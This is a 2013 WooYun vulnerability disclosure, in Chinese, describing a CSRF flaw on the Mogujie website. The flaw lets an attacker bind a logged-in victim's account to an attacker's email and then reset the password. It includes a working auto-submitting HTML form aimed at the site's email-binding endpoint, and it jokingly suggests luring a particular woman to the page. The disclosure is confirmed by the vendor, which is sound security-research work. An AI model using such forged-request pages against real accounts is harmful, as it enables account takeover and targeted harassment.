当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016805

漏洞标题:谁说蘑菇街妹子很多的---另类方式重置蘑菇街妹子帐号密码

相关厂商:蘑菇街

漏洞作者: 风萧萧

提交时间:2013-01-02 10:06

修复时间:2013-02-16 10:07

公开时间:2013-02-16 10:07

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-02: 细节已通知厂商并且等待厂商处理中
2013-01-02: 厂商已经确认,细节仅向厂商公开
2013-01-12: 细节向核心白帽子及相关领域专家公开
2013-01-22: 细节向普通白帽子公开
2013-02-01: 细节向实习白帽子公开
2013-02-16: 细节向公众公开

简要描述:

谁信我?

详细说明:

1.修改他人帐号是违法行为,我是个好人,只是测试而已!那么,如何通过漏洞修改他人帐号呢?曾经爆出过类似的漏洞有很多,我这里只是讲述下最近的研究心得。即通过CSRF绑定指定邮箱导致、密码取回导致指定妹子帐号密码修改!
2.首先登陆蘑菇街,点击【个人设置】:

1.jpg


3.找到绑定帐号的地方,我这里本来是没有验证过的gmail邮箱:

2.jpg


4.设置好代理,点击【确定】,将请求包抓下。根据请求包的内容,自己构造一个POST请求页面:

<html>
<body>
<form id="fengxiaoxiao" name="fengxiaoxiao" action="http://www.mogujie.com/settings/bindemail" method="POST">
<input type="text" name="userEmail" value="**********@qq.com" />
<input type="text" name="step" value="1" />
<input type="submit" value="submit" />
</form>
<script>
document.fengxiaoxiao.submit();
</script>
</body>
</html>

漏洞证明:

5.嗯,下面是具体应用场景:如果你对某个妹子感兴趣,那么诱使她在登录蘑菇街的情况下访问上述代码即可做到将其账号绑定自己的邮箱!但是如果你深爱,请勿使用猥琐战术!好,查看下我指定的邮箱吧!

3.jpg


6.点击账号绑定的链接吧!我忘记了截最原始的图,当我回过头再去找那个曾经的【绑定成功】时,它却变成了不需要再次验证,各位看官讲究着看吧!

4.jpg


7.不过可以通过这里,看到我已经成功了!

5.jpg


8.那么找回密码、重置密码一气呵成!

6.jpg

7.jpg

修复方案:

CSRF没有防范那!肯定不只是这里哦,再好好查查!

版权声明:转载请注明来源 风萧萧@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-01-02 13:48

厂商回复:

非常感谢对蘑菇街安全问题的关注,我们会尽快修复此漏洞.

最新状态:

暂无